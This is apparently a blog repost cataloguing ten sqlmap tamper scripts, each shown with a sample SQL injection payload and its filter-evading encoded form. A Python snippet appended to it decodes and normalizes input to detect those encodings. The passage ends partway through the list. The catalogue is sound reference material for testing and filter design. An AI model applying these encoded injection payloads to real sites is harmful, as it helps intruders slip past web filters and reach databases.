Hi everyone, I'm 哥哥不愛吃米飯. If you like this, feel free to follow me. First of all, this article is a repost from http://www.chuhades.com/post/19590b_4cc51f. It is really practical, so I'm keeping it here as a record for future reference.
(1) apostrophemask.py: UTF-8 encoding

Example:
* Input: AND '1'='1'
* Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87

(2) apostrophenullencode.py: Unicode encoding

Example:
* Input: AND '1'='1'
* Output: AND %00%271%00%27=%00%271%00%27

(3) appendnullbyte.py: appends %00

Example:
* Input: AND 1=1
* Output: AND 1=1%00

Requirement:
* Microsoft Access

(4) base64encode.py: base64 encoding

Example:
* Input: 1' AND SLEEP(5)#
* Output: MScgQU5EIFNMRUVQKDUpIw==

(5) between.py: replaces ">" with "NOT BETWEEN"

Example:
* Input: 'A > B'
* Output: 'A NOT BETWEEN 0 AND B'

(6) bluecoat.py: replaces spaces with a random whitespace character and "=" with "LIKE"

Example:
* Input: SELECT id FROM users where id = 1
* Output: SELECT%09id FROM users where id LIKE 1

Requirement:
* MySQL 5.1, SGOS

(7) chardoubleencode.py: double URL encoding

Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

(8) charencode.py: URL encoding

Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

(9) charunicodeencode.py: Unicode-encodes characters that are not already URL-encoded

Example:
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045

Requirement:
* ASP
* ASP.NET

(10) equaltolike.py: replaces "=" with "LIKE"

Example:
* Input: SELECT * FROM users WHERE id=1
* Output: SELECT * FROM users WHERE id LIKE 1
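A filter that matches on raw request text misses most of the encoded outputs listed above; decoding the input to one canonical form before matching closes that gap. The following Python code is an added example, not part of the reposted article or of sqlmap: the function names and the small `SIGNATURE` rule set are assumptions made for illustration, and it covers only the encoding-based entries (keyword swaps such as between.py and equaltolike.py need rule coverage rather than decoding).

```python
import base64
import re
import unicodedata
from urllib.parse import unquote

# Constructed, deliberately small rule set for this example only.
SIGNATURE = re.compile(
    r"(?i)\band\s+'?1'?\s*=\s*'?1'?|\bsleep\s*\(|\bselect\s.+\sfrom\s")

# Output strings copied from the tamper entries listed above.
PAGE_OUTPUTS = {
    "apostrophemask": "AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87",
    "apostrophenullencode": "AND %00%271%00%27=%00%271%00%27",
    "base64encode": "MScgQU5EIFNMRUVQKDUpIw==",
    "bluecoat": "SELECT%09id FROM users where id LIKE 1",
    "chardoubleencode": "%2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545",
    "charencode": "%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45",
    "charunicodeencode": "%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045",
}

def canonicalize(value, max_rounds=5):
    """Reduce a request parameter to one canonical form before rule matching."""
    for _ in range(max_rounds):  # repeat so double URL encoding is fully unwrapped
        previous = value
        # %uXXXX (ASP/ASP.NET style) is not understood by urllib; decode it here.
        value = re.sub(r"%u([0-9a-fA-F]{4})",
                       lambda m: chr(int(m.group(1), 16)), value)
        value = unquote(value)
        if value == previous:
            break
    value = unicodedata.normalize("NFKC", value)  # folds full-width U+FF07 to '
    value = value.replace("\x00", "")             # drop embedded and trailing NULs
    return re.sub(r"\s+", " ", value)             # tab and other whitespace -> space

def candidate_forms(value):
    """Canonical form, plus the decoded form when the value is valid base64 text."""
    forms = [canonicalize(value)]
    try:
        decoded = base64.b64decode(unquote(value), validate=True).decode("utf-8")
        forms.append(canonicalize(decoded))
    except ValueError:  # not base64, or not UTF-8 text once decoded
        pass
    return forms

def is_suspicious(value):
    """True when any canonical form of the value matches the rule set."""
    return any(SIGNATURE.search(form) for form in candidate_forms(value))

if __name__ == "__main__":
    for name, raw in PAGE_OUTPUTS.items():
        print(name, bool(SIGNATURE.search(raw)), is_suspicious(raw))
```

Run directly, it prints for each entry whether the raw string and the canonicalized string match the rule set.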
To be continued...